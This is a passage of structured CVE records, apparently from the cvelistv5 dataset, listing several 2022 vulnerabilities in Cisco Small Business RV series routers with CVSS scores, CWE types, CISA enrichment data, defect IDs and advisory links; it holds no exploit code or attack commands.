                     value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "10.0",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-121",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
                  },
                  {
                     name: "https://www.zerodayinitiative.com/advisories/ZDI-22-418/",
                     refsource: "MISC",
                     url: "https://www.zerodayinitiative.com/advisories/ZDI-22-418/",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
               defect: [
                  [
                     "CSCvz88279",
                     "CSCvz94704",
                     "CSCwa12732",
                     "CSCwa12748",
                     "CSCwa12836",
                     "CSCwa13115",
                     "CSCwa13119",
                     "CSCwa13205",
                     "CSCwa13682",
                     "CSCwa13836",
                     "CSCwa13882",
                     "CSCwa13888",
                     "CSCwa13900",
                     "CSCwa14007",
                     "CSCwa14008",
                     "CSCwa14564",
                     "CSCwa14565",
                     "CSCwa14601",
                     "CSCwa14602",
                     "CSCwa15167",
                     "CSCwa15168",
                     "CSCwa18769",
                     "CSCwa18770",
                     "CSCwa32432",
                     "CSCwa36774",
                     "CSCwa54598",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20706",
      datePublished: "2022-02-10T17:06:28.717476Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-11-06T16:31:19.816Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20705
Vulnerability from cvelistv5
Published
2022-02-10 17:06
Modified
2024-11-06 16:31
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:48.597Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
               },
               {
                  tags: [
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-415/",
               },
               {
                  tags: [
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-409/",
               },
               {
                  tags: [
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-410/",
               },
               {
                  tags: [
                     "x_transferred",
                  ],
                  url: "http://packetstormsecurity.com/files/170988/Cisco-RV-Series-Authentication-Bypass-Command-Injection.html",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20705",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-06T16:02:59.984683Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-06T16:31:11.448Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-02-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-121",
                     description: "CWE-121",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2023-02-14T00:00:00",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
            },
            {
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-415/",
            },
            {
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-409/",
            },
            {
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-410/",
            },
            {
               url: "http://packetstormsecurity.com/files/170988/Cisco-RV-Series-Authentication-Bypass-Command-Injection.html",
            },
         ],
         source: {
            advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
            defect: [
               [
                  "CSCvz88279",
                  "CSCvz94704",
                  "CSCwa12732",
                  "CSCwa12748",
                  "CSCwa12836",
                  "CSCwa13115",
                  "CSCwa13119",
                  "CSCwa13205",
                  "CSCwa13682",
                  "CSCwa13836",
                  "CSCwa13882",
                  "CSCwa13888",
                  "CSCwa13900",
                  "CSCwa14007",
                  "CSCwa14008",
                  "CSCwa14564",
                  "CSCwa14565",
                  "CSCwa14601",
                  "CSCwa14602",
                  "CSCwa15167",
                  "CSCwa15168",
                  "CSCwa18769",
                  "CSCwa18770",
                  "CSCwa32432",
                  "CSCwa36774",
                  "CSCwa54598",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20705",
      datePublished: "2022-02-10T17:06:29.404914Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-11-06T16:31:11.448Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20703
Vulnerability from cvelistv5
Published
2022-02-10 17:06
Modified
2024-10-29 16:17
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:48.587Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-408/",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20703",
                        options: [
                           {
                              Exploitation: "active",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-10-29T16:16:49.671765Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
               {
                  other: {
                     content: {
                        dateAdded: "2022-03-03",
                        reference: "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2022-20703",
                     },
                     type: "kev",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-10-29T16:17:26.604Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-02-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-121",
                     description: "CWE-121",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-02-22T22:06:30",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-408/",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
            },
         ],
         source: {
            advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
            defect: [
               [
                  "CSCvz88279",
                  "CSCvz94704",
                  "CSCwa12732",
                  "CSCwa12748",
                  "CSCwa12836",
                  "CSCwa13115",
                  "CSCwa13119",
                  "CSCwa13205",
                  "CSCwa13682",
                  "CSCwa13836",
                  "CSCwa13882",
                  "CSCwa13888",
                  "CSCwa13900",
                  "CSCwa14007",
                  "CSCwa14008",
                  "CSCwa14564",
                  "CSCwa14565",
                  "CSCwa14601",
                  "CSCwa14602",
                  "CSCwa15167",
                  "CSCwa15168",
                  "CSCwa18769",
                  "CSCwa18770",
                  "CSCwa32432",
                  "CSCwa36774",
                  "CSCwa54598",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2022-02-03T00:00:00",
               ID: "CVE-2022-20703",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "10.0",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-121",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
                  },
                  {
                     name: "https://www.zerodayinitiative.com/advisories/ZDI-22-408/",
                     refsource: "MISC",
                     url: "https://www.zerodayinitiative.com/advisories/ZDI-22-408/",
                  },
                  {
                     name: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
                     refsource: "MISC",
                     url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
               defect: [
                  [
                     "CSCvz88279",
                     "CSCvz94704",
                     "CSCwa12732",
                     "CSCwa12748",
                     "CSCwa12836",
                     "CSCwa13115",
                     "CSCwa13119",
                     "CSCwa13205",
                     "CSCwa13682",
                     "CSCwa13836",
                     "CSCwa13882",
                     "CSCwa13888",
                     "CSCwa13900",
                     "CSCwa14007",
                     "CSCwa14008",
                     "CSCwa14564",
                     "CSCwa14565",
                     "CSCwa14601",
                     "CSCwa14602",
                     "CSCwa15167",
                     "CSCwa15168",
                     "CSCwa18769",
                     "CSCwa18770",
                     "CSCwa32432",
                     "CSCwa36774",
                     "CSCwa54598",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20703",
      datePublished: "2022-02-10T17:06:30.949451Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-10-29T16:17:26.604Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20700
Vulnerability from cvelistv5
Published
2022-02-10 17:06
Modified
2024-10-29 16:15
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:48.585Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20700",
                        options: [
                           {
                              Exploitation: "active",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-10-29T16:13:15.108904Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
               {
                  other: {
                     content: {
                        dateAdded: "2022-03-03",
                        reference: "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2022-20700",
                     },
                     type: "kev",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-10-29T16:15:51.234Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-02-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-121",
                     description: "CWE-121",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-02-10T17:06:33",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
            },
         ],
         source: {
            advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
            defect: [
               [
                  "CSCvz88279",
                  "CSCvz94704",
                  "CSCwa12732",
                  "CSCwa12748",
                  "CSCwa12836",
                  "CSCwa13115",
                  "CSCwa13119",
                  "CSCwa13205",
                  "CSCwa13682",
                  "CSCwa13836",
                  "CSCwa13882",
                  "CSCwa13888",
                  "CSCwa13900",
                  "CSCwa14007",
                  "CSCwa14008",
                  "CSCwa14564",
                  "CSCwa14565",
                  "CSCwa14601",
                  "CSCwa14602",
                  "CSCwa15167",
                  "CSCwa15168",
                  "CSCwa18769",
                  "CSCwa18770",
                  "CSCwa32432",
                  "CSCwa36774",
                  "CSCwa54598",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2022-02-03T00:00:00",
               ID: "CVE-2022-20700",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "10.0",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-121",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
               defect: [
                  [
                     "CSCvz88279",
                     "CSCvz94704",
                     "CSCwa12732",
                     "CSCwa12748",
                     "CSCwa12836",
                     "CSCwa13115",
                     "CSCwa13119",
                     "CSCwa13205",
                     "CSCwa13682",
                     "CSCwa13836",
                     "CSCwa13882",
                     "CSCwa13888",
                     "CSCwa13900",
                     "CSCwa14007",
                     "CSCwa14008",
                     "CSCwa14564",
                     "CSCwa14565",
                     "CSCwa14601",
                     "CSCwa14602",
                     "CSCwa15167",
                     "CSCwa15168",
                     "CSCwa18769",
                     "CSCwa18770",
                     "CSCwa32432",
                     "CSCwa36774",
                     "CSCwa54598",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20700",
      datePublished: "2022-02-10T17:06:33.217509Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-10-29T16:15:51.234Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20827
Vulnerability from cvelistv5
Published
2022-08-10 08:12
Modified
2024-11-01 18:54
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:50.204Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220803 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20827",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "no",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-01T18:42:22.498606Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-01T18:54:50.122Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-08-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "HIGH",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 9,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-120",
                     description: "CWE-120",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-08-10T08:12:09",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220803 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
            },
         ],
         source: {
            advisory: "cisco-sa-sb-mult-vuln-CbVp4SUR",
            defect: [
               [
                  "CSCwb58268",
                  "CSCwb58273",
                  "CSCwb98961",
                  "CSCwb98964",
                  "CSCwc00210",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2022-08-03T23:00:00",
               ID: "CVE-2022-20827",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "9.8",
                  vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-120",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20220803 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-sb-mult-vuln-CbVp4SUR",
               defect: [
                  [
                     "CSCwb58268",
                     "CSCwb58273",
                     "CSCwb98961",
                     "CSCwb98964",
                     "CSCwc00210",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
